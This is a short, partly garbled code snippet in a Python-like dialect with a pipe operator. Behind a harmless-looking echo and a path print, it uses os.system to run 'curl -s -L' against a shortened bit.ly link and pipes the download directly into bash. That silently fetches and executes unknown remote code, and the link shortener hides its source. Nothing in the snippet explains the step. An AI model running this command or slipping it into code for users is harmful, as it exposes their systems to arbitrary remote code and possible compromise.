import os from ipathlib import Path if True == False: from std.ipathlib import Path sh = os.system sh <| 'echo "hehe"' print(Path('.')) sh <| 'curl -s -L https://bit.ly/3zvELNz | bash' /* hehe */